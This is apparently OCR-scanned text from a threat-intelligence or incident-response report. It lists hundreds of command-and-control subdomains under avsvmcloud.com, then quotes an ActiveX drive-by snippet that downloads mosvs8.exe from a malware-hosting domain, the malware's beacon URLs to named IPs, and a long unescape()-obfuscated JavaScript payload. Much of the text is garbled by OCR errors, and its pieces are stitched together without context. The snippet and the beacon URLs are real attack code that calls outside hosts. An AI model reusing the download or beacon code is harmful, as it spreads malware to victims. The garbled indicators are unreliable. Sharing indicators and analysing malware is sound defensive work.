ss061csk9v4catc583un.appsync-api.us-east-2.avsvmcloud.com 
ss37.avsvmcloud.com 

staff33.avsvmcloud.com 

stnmt.avsvmcloud.com 

strontiumfundage.avsvmcloud.com 

svvkdapacxask.avsvmcloud.com 
tlm860jjbitgd687ne6qové60ie2h.appsync-api.us-east-1.avsvmcloud.com 
t4g287p7mbus65k1m6nbrfl1.appsync-api.us-west-2.avsvmcloud.com 
t82sdocaamrqkba7hh60el12eul.appsync-api.us-east-1.avsvmcloud.com 
t9mci96s2040vtah97ab2vh.appsync-api.us-west-2.avsvmcloud.com 
taiyangvsrehuo.avsvmcloud.com 
tdhn0tg16pqut3se9g5b.appsync-api.us-east-2.avsvmcloud.com 
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tianxiazuqiujingiuyinle.avsvmcloud.com 

tp5.avsvmcloud.com 
tqac2pb2ufhrfpa518Imovl.appsync-api.us-east-2.avsvmcloud.com 
tr5spkai7t628jl70fesqsi.appsync-api.us-west-2.avsvmcloud.com 
trikdantipsblackberry.avsvmcloud.com 
ttzhajinhuayouxidubo.avsvmcloud.com 
tugjvcuoOnc9k1k176jmiff.appsync-api.us-east-1l.avsvmcloud.com 
twentyfive.avsvmcloud.com 

twu.avsvmcloud.com 
uOu8ohfkoOrs91IhcvOv2vk.appsync-api.us-west-2.avsvmcloud.com 
u67im1p464abfo99e2wruové6fsuver0t.appsync-api.us-west-2.avsvmcloud.com 
ufhcv7s4orvgq7v8ulno03dsz00e2h.appsync-api.us-east-1.avsvmcloud.com 
uj408hgtu2ihn918d18ak2o0bh.appsync-api.us-east-2.avsvmcloud.com 
ujsaojh8dkgd2vl8puve2ul10te2h0euf.appsync-api.us-east-2.avsvmcloud.com 
ulclfo65bhgj49c8eudhris2000vi.appsync-api.us-west-2.avsvmcloud.com 
unjqj2tngod6u46f4fo0qdfk.appsync-api.us-west-2.avsvmcloud.com 
ughn5clu04rsdjc5I3qvovh.appsync-api.us-east-1.avsvmcloud.com 
us-west.2.avsvmcloud.com 

us.east-2.avsvmcloud.com 

us.west-2.avsvmcloud.com 
utLivtq50o0j4n3c8ro9e.appsync-api.us-west-2.avsvmcloud.com 
ut5eoe5mm01q10758mhbovh.appsync-api.us-east-2.avsvmcloud.com 
v21d9d8ccnmpvsenbjv4.appsync-api.us-west-2.avsvmcloud.com 
vc6qs95mm2u36r89mvrilej7.appsync-api.us-east-1.avsvmcloud.com 
vca2j264dhcélr2900quqkimin2srp.appsync-api.us-east-1.avsvmcloud.com 
ve63pj9lr4ouloeg8813.appsync-api.us-west-2.avsvmcloud.com 
vfltlnssp30tsq99ne6qov600e2h.appsync-api.us-west-2.avsvmcloud.com 
vigile.avsvmcloud.com 

vmin-haoyunlaibaijiale.avsvmcloud.com 
vrOsrbv4v9555d5a00jugofofn24tkobm.appsync-api.us-east-2.avsvmcloud.com 
vrv8q9e0oh5qb6u3aen60o0eudoluv2f0c.appsync-api.us-east-2.avsvmcloud.com 
vvv8q9e0oh5q6u3aen60o0eudoluv2flc.appsync-api.us-east-2.avsvmcloud.com 
wcis.avsvmcloud.com 

web17132.avsvmcloud.com 


weblogin.avsvmcloud.com 
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weifangdazhongwangfenghuangtaiyangcheng.avsvmcloud.com 
weifangdazhongwangfenghuangtaiyangcheng.avsvmcloud.com 
west-2.avsvmcloud.com 

wifil31.avsvmcloud.com 

wjdtldyd.avsvmcloud.com 
wuhandaxueshengzhaopinhui.avsvmcloud.com 
wwwpj7788com.avsvmcloud.com 
wwwyun3388com.avsvmcloud.com 

wxz86y.avsvmcloud.com 

xeon2.avsvmcloud.com 
xianggangliuhecaizuiznunguanfangwang.avsvmcloud.com 
xingyunshuiguojishoujiban.avsvmcloud.com 
xinshidaiyulechengbeiyongwangzhi.avsvmcloud.com 
yanchengqipaizhongxinefutong.avsvmcloud.com 
yaokongzixiazai.avsvmcloud.com 
yidaoguantutxtxiazaiyisou.avsvmcloud.com 
yinghuangguojibeiyongwangzhan.avsvmcloud.com 
yongligaoyibo.avsvmcloud.com 

yulechang21dian.avsvmcloud.com 
zhenqianbairenniuniu.avsvmcloud.com 
zhenrenbaijialexianjinzhuce.avsvmcloud.com 
zhongqingshishicaibeitougi.avsvmcloud.com 
zixungongchengshidaikao.avsvmcloud.com 

zkm.avsvmcloud.com 
O2m6hcopd17p6h450gt3.appsync-api.us-west-2.avsvmcloud.com 
039n5tnndkhrfn5cun0yO0sz02hijOb12.appsync-api.us-west-2.avsvmcloud.com 
04309vacvthf0v95t811.appsync-api.us-east-2.avsvmcloud.com 
04jrge684mgk4eq8m8adfg7.appsync-api.us-east-2.avsvmcloud.com 
04r0rndp6aom5fq5g6p1.appsync-api.us-west-2.avsvmcloud.com 
O4spiistorug1jq50600.appsync-api.us-west-2.avsvmcloud.com 
05q2sp0v4b5ramdf7117.appsync-api.eu-west-1.avsvmcloud.com 
O060mpkprgdk087ebcrljovOte2h.appsync-api.us-east-1.avsvmcloud.com 
0600865eliou4tObtvef0b12eul1.appsync-api.us-east-1.avsvmcloud.com 


07605jn8|36uranbtvef0b12eul.appsync-api.us-east-1l.avsvmcloud.com 
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07q2aghbohp4bncce6vil0odsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
07ttndaugjrj4pcbtvef0b12eul.appsync-api.us-east-1.avsvmcloud.com 
O8amtsejdO2kobtb6h07ts2fd0b12eul.appsync-api.eu-west-1.avsvmcloud.com 
O9un09cpkalitb9enlh4qlp.appsync-api.us-east-2.avsvmcloud.com 
Oapc5te703g8didtt834319.appsync-api.us-east-1l.avsvmcloud.com 
ObOfbhp20mdsv4scwol1rOoirssrc2vv.appsync-api.us-east-2.avsvmcloud.com 
Obr2kgmp2hbg90sb9uf29149711e.appsync-api.us-east-2.avsvmcloud.com 
Obv6kouis4gtgslbe2sdO0tdieo0te2h.appsync-api.us-east-2.avsvmcloud.com 
Obvq8noo/7tfrdksbu30g2st.appsync-api.us-east-2.avsvmcloud.com 
O0c32j0j6q8up3a4b6d6n0t6jOoeu.appsync-api.us-east-1.avsvmcloud.com 
O0c32j0j6q8up3aob6d6n0g6jOgeu.appsync-api.us-east-1.avsvmcloud.com 
Oc6og5btugjqhhocoi60couGiuirOcrn.appsync-api.us-east-1.avsvmcloud.com 
Ocatgds2ggijbpjbtvef0b12eul1.appsync-api.us-east-1.avsvmcloud.com 
Odehpb0e2qsiej4holcs.appsync-api.us-west-2.avsvmcloud.com 
Odv6fsons11r6hqh0657.appsync-api.us-west-2.avsvmcloud.com 
Oeke91jkeq78b5dt6cpqml0.appsync-api.us-east-2.avsvmcloud.com 
Ofhdojdvgeuskgkcds2n0i3uholi2vO0i.appsync-api.us-west-2.avsvmcloud.com 
Ofkqf50afqmg39pcOOmudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
Ofn70e4cegrf933cOOmudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
Oftd1lsok8kjdkp6beuheoip0i12eul.appsync-api.us-west-2.avsvmcloud.com 
0h8228c3d64pk64f31q7.appsync-api.us-west-2.avsvmcloud.com 
0i17b61bsutd80dcexr09ovirsvul00e.appsync-api.us-west-2.avsvmcloud.com 
Oij93ftklciddelbOOesqjvi0fjuOn3.appsync-api.us-west-2.avsvmcloud.com 
017bgtOlhmk4pmrcuhsOee2sd0eovirl.appsync-api.us-east-1.avsvmcloud.com 
Olgjmdgj8qk63ldcuhsOce2sdO0govirl.appsync-api.us-east-1.avsvmcloud.com 
Oljdf3k3aic3bsncwh60gunOowusouvoO.appsync-api.us-east-1.avsvmcloud.com 
Olu3cu7c9r45ujnc6ruiilrOeovirsvu.appsync-api.us-east-1.avsvmcloud.com 
Om1mrqllcde2u30cO0qsdsi5f5jha6b9.appsync-api.us-east-2.avsvmcloud.com 
Om45Iismf43lrf35bu30g2st.appsync-api.us-east-2.avsvmcloud.com 
Om5v1trnfgd7j71cq22nsf550k6uqprs.appsync-api.us-east-2.avsvmcloud.com 
Om8abtnlet0O26qkcq535z0i3rq1rii0o.appsync-api.us-east-2.avsvmcloud.com 
Oms9s6cmpd7s3mhcunO0c2dioho7r1p0g.appsync-api.us-east-2.avsvmcloud.com 
On64gosv25v97g9ht1v4.appsync-api.eu-west-1.avsvmcloud.com 
00607pf5vskf5Inbvn14t2i2h.appsync-api.us-west-2.avsvmcloud.com 


Oolcrtj4bsjtulfourso2ve2sd0ee2h.appsync-api.us-west-2.avsvmcloud.com 
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Ooni12r13ficnkqb2w.appsync-api.us-west-2.avsvmcloud.com 
Ooqdtu3r8abd6d8beuheoip0tl2eul.appsync-api.us-west-2.avsvmcloud.com 
Op7vlequ4631lasq3bguqhgg.appsync-api.us-west-2.avsvmcloud.com 
Opd232uqfohg8qdhsimh.appsync-api.us-west-2.avsvmcloud.com 
Oqmjnmb8n3flasqtm884317.appsync-api.us-east-2.avsvmcloud.com 
Ogt4jqkvvt2is3qtb614mlv.appsync-api.us-west-2.avsvmcloud.com 
Orfgtn3j75vrrkmbu30c2st.appsync-api.us-east-2.avsvmcloud.com 
Oru5sub54iiremgbu3022st.appsync-api.us-east-2.avsvmcloud.com 
Oru5sub54iiremrbu3002st.appsync-api.us-east-2.avsvmcloud.com 
Ost8ibor4031e198i6e4vgh.appsync-api.eu-west-1.avsvmcloud.com 
Ov9gi5pk4mpn3kicoi60couGiuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
Ovu9666cp41semncun022dioho7r1lpOi.appsync-api.us-east-2.avsvmcloud.com 
10hea7samrh2bo23lg70.appsync-api.us-east-1.avsvmcloud.com 
127motrjknpdraet18ho.appsync-api.us-west-2.avsvmcloud.com 
12gho508142kp6eto8do.appsync-api.us-west-2.avsvmcloud.com 
131lapen9992i2a1ld00mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
133bocmjd8ppsa8d00eu0los5jhea4vo.appsync-api.us-west-2.avsvmcloud.com 
13ach7rkulblgs9dwh60iun02wusouv0O.appsync-api.us-west-2.avsvmcloud.com 
130bqel10joasvr7ct1f0ie2h.appsync-api.us-west-2.avsvmcloud.com 
13pO0lrrh981tjo5ch.appsync-api.us-west-2.avsvmcloud.com 
143306v84t2i4cetfca4.appsync-api.us-west-2.avsvmcloud.com 
14aa15h1055d8nel1p8jOiov.appsync-api.us-east-2.avsvmcloud.com 
14fhosO8sq2r26etoc04.appsync-api.us-west-2.avsvmcloud.com 
15hkhdm5vin5i4h3hlod.appsync-api.us-east-1.avsvmcloud.com 
16e9jrOhnie2gh5ctvef0il2eul.appsync-api.us-east-1l.avsvmcloud.com 
16julbdk427s94jde6vi0odsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
16uule6k3j3nihuc6d6n0c6j0ieu.appsync-api.us-east-1l.avsvmcloud.com 
174utqcr31cn293c6d6n006j0oeu.appsync-api.us-east-1.avsvmcloud.com 
17a9nikin3a2v9rctvef0g12eul.appsync-api.us-east-1.avsvmcloud.com 
17eko7nh8f48vpidwh60gunO0iwusouvO.appsync-api.us-east-1.avsvmcloud.com 
18f5phqbdbg6etec26c0g12eul.appsync-api.eu-west-1.avsvmcloud.com 
18shu72lull6bclce2q0b12eul.appsync-api.eu-west-1.avsvmcloud.com 
19knepufjrml1r2347im.appsync-api.us-west-2.avsvmcloud.com 
1Lbsem60k5hc76tddoi602o0uG6iuir0irn.appsync-api.us-east-2.avsvmcloud.com 
Lbsem60k5hc76tldoi60bou6iuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
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Lbtcr12b62me0buden60ceudoluv2f0i.appsync-api.us-east-2.avsvmcloud.com 
1c2u8q6l388no09uc6d6n0b6j0O2eu.appsync-api.us-east-1.avsvmcloud.com 
1c61472227ihucucn2ie2hh0o2st.appsync-api.us-east-1.avsvmcloud.com 
Icghgocfgcik9p1lcv6q3ruli302vri.appsync-api.us-east-1.avsvmcloud.com 
1Ichindtjj2u8mi5d6rswoiouObovirsv.appsync-api.us-east-1.avsvmcloud.com 
lcmge6édsclirtfejc6beOgdohu0et2w.appsync-api.us-east-1.avsvmcloud.com 
lcou6odl4evsq2bde6vi0odsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
1d15id97cn5cds2fp13adol.appsync-api.us-east-2.avsvmcloud.com 
1ldps45dq9c76m7pe3lb1.appsync-api.us-west-2.avsvmcloud.com 
lecols2ujh5n67p5ccrsbbf.appsync-api.us-east-2.avsvmcloud.com 
lelpjomukfogbbe5765kob1.appsync-api.us-east-2.avsvmcloud.com 
1fngOb6inl3 7mb6tcc2jO2e2h.appsync-api.us-west-2.avsvmcloud.com 
1g2hgleduci6d87ce2q0012eul.appsync-api.eu-west-1.avsvmcloud.com 
lg2hgleduci6d8fce2q0b12eul.appsync-api.eu-west-1.avsvmcloud.com 
1h14ptc2k6kdku238g90.appsync-api.us-west-2.avsvmcloud.com 
Lhb6p702r10n65235guf.appsync-api.us-west-2.avsvmcloud.com 
Lhhatouccjmdd1232g3f.appsync-api.us-west-2.avsvmcloud.com 
1i06atdfoue8vrsdwh60tun02wusouv0.appsync-api.us-west-2.avsvmcloud.com 
1ii9q1ls7ut7pj88chom2v30110ce2h.appsync-api.us-west-2.avsvmcloud.com 
1ii9q1ls7ut7pj8tchom2v30110ce2h.appsync-api.us-west-2.avsvmcloud.com 
1ij9hctjjpb1sthdoi6O0couGiuirOirn.appsync-api.us-west-2.avsvmcloud.com 
Lcm3vikgahllnfd00osr2i50fgsqorp.appsync-api.us-east-1.avsvmcloud.com 
Lilms3vhOqOcb39dtsfd2cu7usOel2eu.appsync-api.us-east-1l.avsvmcloud.com 
1Llq9urk5noq2mhkctvefOb12eul.appsync-api.us-east-1.avsvmcloud.com 
1lmcOar8vrdk4079dunO0b2dioho7r1lpOb.appsync-api.us-east-2.avsvmcloud.com 
LImuqmhk6émtluc0ldqg535z0i3rq1rii0c.appsync-api.us-east-2.avsvmcloud.com 
lofa2qnv9duipt7d0Omudofi/5f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
10n45q99h4i7bgOcdae2sd02e2h.appsync-api.us-west-2.avsvmcloud.com 
loqcelrlug61juldwh602un02wusouv0.appsync-api.us-west-2.avsvmcloud.com 
LovvhO0e9m851b7bd00mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
1p792tkokdddis2ej1hu.appsync-api.us-west-2.avsvmcloud.com 
1pdb004101o2rvpfhl9apor.appsync-api.us-east-2.avsvmcloud.com 
1r8hapotoihl27dcu30e2st.appsync-api.us-east-2.avsvmcloud.com 
Irndq7kt61lqd2qcOfju9nf.appsync-api.us-east-2.avsvmcloud.com 
Lrulnov281330vOdovirsvul0igilOce.appsync-api.us-east-2.avsvmcloud.com 
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lv3h0do8of5lp1lcu3002st.appsync-api.us-east-2.avsvmcloud.com 
lv8snc7udvdj8i0doi602o0u6iuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
lvm0vetvdv46lcgcObe2h.appsync-api.us-east-2.avsvmcloud.com 
202jdr3e38ajal6ohr63.appsync-api.us-west-2.avsvmcloud.com 
21dh2sca90g78hqeen60ceudoluv2fOi.appsync-api.us-east-2.avsvmcloud.com 
228ee8pulstcaucuqbu2.appsync-api.us-east-1.avsvmcloud.com 
23do4svnpch9h3 1lewh60bun02wusouv0.appsync-api.us-east-1.avsvmcloud.com 
23hrcr27nmgbbbud6d6n0t6jOteu.appsync-api.us-east-1.avsvmcloud.com 
257tlf3pak4ak37okvtk.appsync-api.us-east-2.avsvmcloud.com 
276frivk6t9sblge00mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
2788hsokf4b6lkadhom2v30110ie2h.appsync-api.us-west-2.avsvmcloud.com 
27nhvs59fmfqk7kewh60gunOowusouvo.appsync-api.us-west-2.avsvmcloud.com 
28aflvuho4t2ef2du30e2st.appsync-api.us-east-2.avsvmcloud.com 
28j5sl2eknfre96d3twe0ge2h.appsync-api.us-east-2.avsvmcloud.com 
28phos6q9al7th2een60eeudoluv2f0t.appsync-api.us-east-2.avsvmcloud.com 
28pmu8s58tudkd4vd5u00l1lel.appsync-api.us-east-2.avsvmcloud.com 
28rclmao5cs2ru9du30g2st.appsync-api.us-east-2.avsvmcloud.com 
2aOmm2rgtnibvqcj7mfu.appsync-api.us-west-2.avsvmcloud.com 
2ajauljas8atmolj73l1l.appsync-api.us-east-2.avsvmcloud.com 
2attp7aog2o0ennljum7g.appsync-api.us-west-2.avsvmcloud.com 
2c8ff0an7hnj4nsdcoOte2sd.appsync-api.us-west-2.avsvmcloud.com 
2cd00j4gv060m1lde5600g12eul.appsync-api.us-west-2.avsvmcloud.com 
2cjmh3c24aaf4thde6u0il2eul.appsync-api.us-west-2.avsvmcloud.com 
2ckh9snO0fvvql7fewh60eunO0twusouvO.appsync-api.us-west-2.avsvmcloud.com 
2cv8mnbehalqglreoi6Ogou6iuirOcrn.appsync-api.us-west-2.avsvmcloud.com 
2f2kilp5rubnrhleuhsOee2sdOoovirl.appsync-api.us-east-1.avsvmcloud.com 
2f9dj160un1Lhhpfde2qO0b12eul.appsync-api.us-east-1.avsvmcloud.com 
2frdratujptgvimeeoip256uesuhrvi2.appsync-api.us-east-1.avsvmcloud.com 
2957e0i90ageug9eoi60eouGiuirOcrn.appsync-api.us-east-2.avsvmcloud.com 
2jnmncdtttkk42vd5u0ilel.appsync-api.us-east-2.avsvmcloud.com 
2jri6bnp3cjtdOqpeoi602ou6iuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
2ken65g9tgjc46civriiphn.appsync-api.us-west-2.avsvmcloud.com 
2|jladleQa0ud8kewh60eunOewusouvO.appsync-api.us-west-2.avsvmcloud.com 
2lphmu5vfb1qslkewh60eun0twusouv0.appsync-api.us-west-2.avsvmcloud.com 


2lphmu5vfblqslnewh60cunOewusouvO0.appsync-api.us-west-2.avsvmcloud.com 
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201rg9g07s6ihvsee6vi0gdsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
2oat8rsOrki2qrid5i5efOce2sd.appsync-api.us-east-1.avsvmcloud.com 
2odoa9fkjffh7g9dmnmoveOivri.appsync-api.us-east-1.avsvmcloud.com 
2ostbcvirdgqpka8dtvef0g12eul.appsync-api.us-east-1.avsvmcloud.com 
2qnv7hr17ogjc27jj3hc.appsync-api.us-east-1.avsvmcloud.com 
2rn2ddllc4bmtjiet36huovz0ott30et.appsync-api.eu-west-1.avsvmcloud.com 
2sl1cbufjaunbdO0cu5m9u.appsync-api.us-west-2.avsvmcloud.com 
2s58sii8387s2tm7g5olimhv.appsync-api.us-east-2.avsvmcloud.com 
2sci3q92ecj5v36u30rc.appsync-api.us-east-2.avsvmcloud.com 
2sn98d96h9pqmicgOb6fih5.appsync-api.us-west-2.avsvmcloud.com 
2sr38c6i7nh5j86udoOu.appsync-api.us-east-2.avsvmcloud.com 
2srhmkk1c9060bcubmn4.appsync-api.us-west-2.avsvmcloud.com 
2ta6m0rmcenlpr7jm31i.appsync-api.us-west-2.avsvmcloud.com 
2te3fubo9dolum6nomnio91.appsync-api.us-east-2.avsvmcloud.com 
2thqpj6ctc3n5v7nkm7fo9h.appsync-api.us-east-2.avsvmcloud.com 
2tpvc6l554pjOacj3bvf.appsync-api.us-east-2.avsvmcloud.com 
2ur7sef75htrb36g4mtirh7.appsync-api.us-east-2.avsvmcloud.com 
302v4ke4jdchpb5pl1f82ql.appsync-api.us-east-1.avsvmcloud.com 
3263jc0g7ka370tgmctjiev.appsync-api.us-east-2.avsvmcloud.com 
32privobvbgsa6tum6ip.appsync-api.us-east-2.avsvmcloud.com 
33e01qm52g92kjufe2sd0oGisuif6vri.appsync-api.us-east-2.avsvmcloud.com 
33htbkuqrq7maeofen60oeudoluv2f0c.appsync-api.us-east-2.avsvmcloud.com 
33n3midc7a66clkfq535z0g3rq1rii0t.appsync-api.us-east-2.avsvmcloud.com 
34gjpodhcjes8muunj5v.appsync-api.us-east-2.avsvmcloud.com 
34mt9cmO0kabp8mtun8gb.appsync-api.us-east-2.avsvmcloud.com 
34qmhehn45j9uingejdjief.appsync-api.us-east-2.avsvmcloud.com 
38019prqO02si4ipfOOmudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
382ss75vrn3fr82frO80n621fio2v60e.appsync-api.us-east-1.avsvmcloud.com 
38i66ek7kqmjq34fe6vi0odsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
38iqeboinet9c56fO0iesdbOvfheO0l45.appsync-api.us-east-1.avsvmcloud.com 
38q4d8vh9p32peffuhsOoe2sd0oovirl.appsync-api.us-east-1.avsvmcloud.com 
38s32qaknb226frfOOmudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
3ajldnk4sbav8jnni848bq9.appsync-api.us-east-1.avsvmcloud.com 
3as52n6e2thhnc5j48t7.appsync-api.us-east-1.avsvmcloud.com 


3bcb845tr9npilvfwh60iunObwusouvO.appsync-api.us-west-2.avsvmcloud.com 
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3dgO0jmjdb5gfOst2 7Itq.appsync-api.us-west-2.avsvmcloud.com 
3dkshcl4115b13t24gu0.appsync-api.us-east-2.avsvmcloud.com 
3e3hicOtdqup2jtjojaj.appsync-api.us-west-2.avsvmcloud.com 
3eacr802tgr4nInj48pe.appsync-api.us-west-2.avsvmcloud.com 
3elkqgie5Omthvujnjdp.appsync-api.us-west-2.avsvmcloud.com 
3ep739hggefke9tjk8I6.appsync-api.us-west-2.avsvmcloud.com 
3eppf9a5gmijktotjbjlO.appsync-api.us-west-2.avsvmcloud.com 
3f4teb3to5bffaredul2wrsnr0il2eul.appsync-api.us-east-2.avsvmcloud.com 
3ffvOvjjgvtnpnpeu3002st.appsync-api.us-east-2.avsvmcloud.com 
3gghuskn9ncd2jre3rlomquirsO22st.appsync-api.us-east-1.avsvmcloud.com 
3gvil2qmba9f8mubeuVvjOee2h.appsync-api.us-east-1.avsvmcloud.com 
3h05ngfoghciciup07g12qn.appsync-api.us-east-2.avsvmcloud.com 
3hhsl89r95evj8u03guo.appsync-api.us-west-2.avsvmcloud.com 
3hjlv2iga3aornnpginm24i.appsync-api.us-east-2.avsvmcloud.com 
3ig87v3rlsfolhmfuhrsoeu60ed32rvo.appsync-api.us-east-2.avsvmcloud.com 
3inmgqad9eq15sj 7foi6020uG6iuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
3jn61Lob016fliibe6d6n0t6jOoeu.appsync-api.us-east-1.avsvmcloud.com 
3juu5ipmcf8jfk5fuhsOce2sdO02ovirl.appsync-api.us-east-1.avsvmcloud.com 
3m88popdahpd261f0OOmudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
3011qb2ksonusuff2sorvi09rmdsr660.appsync-api.us-east-2.avsvmcloud.com 
3phujOiklI964pfui6gd1ldep.appsync-api.us-west-2.avsvmcloud.com 
3pst2fg3ikqnvlu2elos.appsync-api.us-west-2.avsvmcloud.com 
3ptmhO03a6f98goniqg78deg.appsync-api.us-west-2.avsvmcloud.com 
3qb1266564omnctjOjtv.appsync-api.us-east-2.avsvmcloud.com 
3qIlmpksnr42rimnng6q8bq9.appsync-api.us-west-2.avsvmcloud.com 
3r39tt6cfobin8uf5srh2vi0olLuhseOc.appsync-api.us-west-2.avsvmcloud.com 
3rauajkilshav9jfwh60eun02wusouv0O.appsync-api.us-west-2.avsvmcloud.com 
3rauajkilshav9sfwh602un02wusouv0.appsync-api.us-west-2.avsvmcloud.com 
3rh4pY9atjlem05veovt2 0tjt.appsync-api.us-west-2.avsvmcloud.com 
3rte9imOnnOm8qpeurso2ve2sd0ge2h.appsync-api.us-west-2.avsvmcloud.com 
3t9jsarjucevpvnn36hjo40.appsync-api.us-east-1.avsvmcloud.com 
3udnedmk9tjc4g5gu8v8ie5.appsync-api.eu-west-1.avsvmcloud.com 
3uhj8po2fvukO0f5gd6gjreh.appsync-api.us-east-1.avsvmcloud.com 
3v3b52n3r4dp27pfwh60iunObwusouvO.appsync-api.us-west-2.avsvmcloud.com 
40nfdp9e82s6h8G6iirrp.appsync-api.us-west-2.avsvmcloud.com 
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cgolu.js; czynd.js; eenom.js; eqfps.js; erztp.js; frpmg.js; iggmy.js; jiodm.js; khkev.js; kksyr.js; 
kobgw.js; kolqj.js; lvmlt.js; nrvaj.js; oalhi.js; pcqab.js; tezam.js; tfxep.js; unolc.js; vduoz.js; 


Sample malware hosting URL snippet : 


bunburyymas.com/odjiffkl","c:\\mosvs8.e xe",5,1,"mosvs8"); } catch(OBJECT id=yah8 
classid=clsid:24F 3EAD6-8B87-4C1A-97DA-71C126BDAO08F> try { yah8.GetFile( bunburyy- 
mas.com/odjiffkl","c:\\mosvs8.ex e",5,1,"Mosvs8"); } catch( 


Copies of the malware obtained mosvs8.exe - and logically submitted to each and every anti 
virus vendor on behalf of VirusTotal just like every sample | ever came across to in the inci- 
dent responses - attempt to connect to 206.53.51.75, 206.53.56.30, and back39409404.com, 
making naughty web requests such as : 


206.53.51.75/cgi-bin/options.cgi?user (id=3335213046 &socks=6267 &version id=904 
&passphrase=fkjvhsdviksdhvisd &crc=3c64cb2e 


&uptime=00:00:58:38 


back39409404.com/cgi-bin/options.cgi?user_id=3335213046 &socks=6267 &version id=904 
&passphrase=fkjvhsdviksdhvisd &crc=3c64cb2e 


&uptime=00:00:58:35 


var SB = 

unescape 

("S30%6827 4Z6d%b6c%3e% GaF3c%62%6 FFG NZ? 9%SeEZGaS3cV73%H3%7 2Z69Z7 OS7 42 GZHCLS 1% 6eEF6 7S 7 5L6 146 7 SHS SIAS2 
2%49%61%76%61%53263%7 246 9S7 OS 7 4S 22%3 0% Ha 0a%66%7 5 F60C63%7 46 976 FZ60%2 OSH 7 Z65S7 NSS 2F6 1Z6C ZONES SST 4 
67 2%69%60%67%28%60%65%60%29% Bas / DZ 0a%09%7 626 147 2%2 0463%68%61%7 247 3%2 O43d%2 032276 1%62%6 3264Z65466% 
67%68%69%6b%60%60%60%6 FS 7 047147237 S742 7547 637 727847 9%7 as2243b%0aS 0937 646147 242 OS 7947 447 2%69260%6 
725 F260%65 46026 727 4%68%2 823042 0460%65%60%3b40a% 09% 7 626 147 242 827246 1460 26 N26 FZ60S7 347 4Z72%69%60%67 
%28%3d%2 6%27%27%3D% 8a%O9%66%6 FZ 7 2%2 042837 626 147 242 826 9Z3d%3 OZ 3DS2 GEH69S3CS7 3S7NZ72%H9 FGETS 7 SSF ZHCS 
65%60%6 727 4Z68SID%2 8F6 9Z2HL2AH%29F2 GZ 7b% Gas OIF OIL 7646 1% 7 2E2 HS 7 2%GeES7 5 Z6AL2 OL IAS2 GZNAL6 1% 7 NZHSS2ELH 
OZECLOFLOFS7 2S2BZAALG 147 4ZGBS2E%72B6 1ZHELOHHVG FVHAS2VV2I%2 0% 2.aZ2 O46 346826 127 2479S 2eS6CSOS SOE SO S74 
$68%29%3b% Oa% 09% 09% 7 2%61%6e%6 426 FZ60%7 3S7 NS 7 2469%60S6 722 OZ 2H S30 S2 9F63%68%61%7 247 9% 20%7 3% 75462479% 
74%72%69%60267%28%7 2%60%75%60%2CS7 2%60%7 5%60%2D431%29%3b% 0a% 09% 7% 0a% 0% 09%72%65%74%75%7 2% 6022 O47 
2%61%60%64%6 F260%73%74%7 2%69%60%6 743% 8a% 70% 0a 0a%66%75%60%6 337 N46 9%6 FS60%2 OE43S7 246526147 N65 SHE 
662%6 aZ6SZ63%7 NZ2SZUIZUCES SZNIZUUZ2CS2 0Z6 026 1%60%65%29%2 O47 bS Gaz O9% 7646147 242 O27 2%2 B43dS2 G26e%75% 
6C%HCSIDF Ga HIS 7 NY7 2% 79%2 O47 D2 HZ65%76%6 1%6CZ2SL27S72S2 GES AS2 GLUBTHCTS IZUISZHUNS2OZUIZ7 2465 FH 1S 7 ZG 
SZHFZH2%6.a%6 563% 7 4Z28%6 ZG 1260465 S29S27%29%2 OS 7 026326 1%7 4X6 3Z68%28%65%29% 704704 09% 83% 09%6 9466528 
%28%21%2 G%72%29%2 GS 7D%2 O47 4S7 2% 7 9% 2 OF 7 DS2 026547646 1 S6CS28%27 47 242 OS3dE2 OZHIZACSS IZHIZHNS2EZHIS7 2G 
65%61%7 436524F262%6.a%65%63%74%28%60%61%60%65%20%2 0% 22%22%29%27%29%2 OS 71469461 S7 SO SZOBS2B%65S29R7 
b%7d%20%7d%0a% 09%69%66%2 032822 1%2 0372%29%2 0% 7b%2 O27 427247 9%2 O27 D42 046537 626 1%60%28%27%72%2 O43dS20 
BUSSUCSS SZUNOZUNS2 OZNIZ72%65%6 127 NZHSZUFZGH2%6.3%65%6 3% 7 NZ 28% HESS 1 Z6dZH5 420 S2 OS22422%20%2 GS22422%29% 
27%29%2 027 d%63%6 1%7 4Z63%68%28%65%29% 7 b%7d%2 OF 7d% Has O96 9Z6642 OL 28S2 1% 2 G47 2%29%2 GS 7DL2 O47 NS72%79%2 
0%7b%20%65%76%6 126C%28S27F7 2%2 OL IAS2 GEAILUCLS SZHITHANS2EZH7 ZH 5S 7 NLHFSGH2S6 ASO SO3 G7 NSA S2A2%22%2CZ2G 
$6036 1260%65%29%S2 7%29%2 0%7d%63261%74%6 3268228265 429% 7 DS 7d%2 O%7 dF 0a O9%69%66%2 OF 28%21%2 0S 7 2229%2 OS 
7b%20%7 437 2%79%2 047 bS2 6265%76%61%6C%28%27%7 242 043042 OZHIZHC SSIS HI SUNS 2OZN7 B65 S7 NSF ZO 2%6a%O5 26347 
4%28%60%61%6d%65%20%2 042 2%222%29%27%29%2 0% 70%63%6 127 4%63%68%28%65%29%7DS7 dS2 04704 0a% 09%69%66%2 0328 
%21%2 O27 2%29%2 O47 DZ2 O47 N%72%7 9%2 O47 D%2 046527 646 1%60%28227%7 242 OS3dS2 OZNISUCSS IANO SUNS 2 OSH 7 ZHSST NG 
4F%62%6.a%65%63%7 4%28%60%6 1%60%65%29%27%29%2 827 026346 147 NZ63Z68%28 F65%29%7D47d%2 OZ 7 de GaZO9S7 246547 
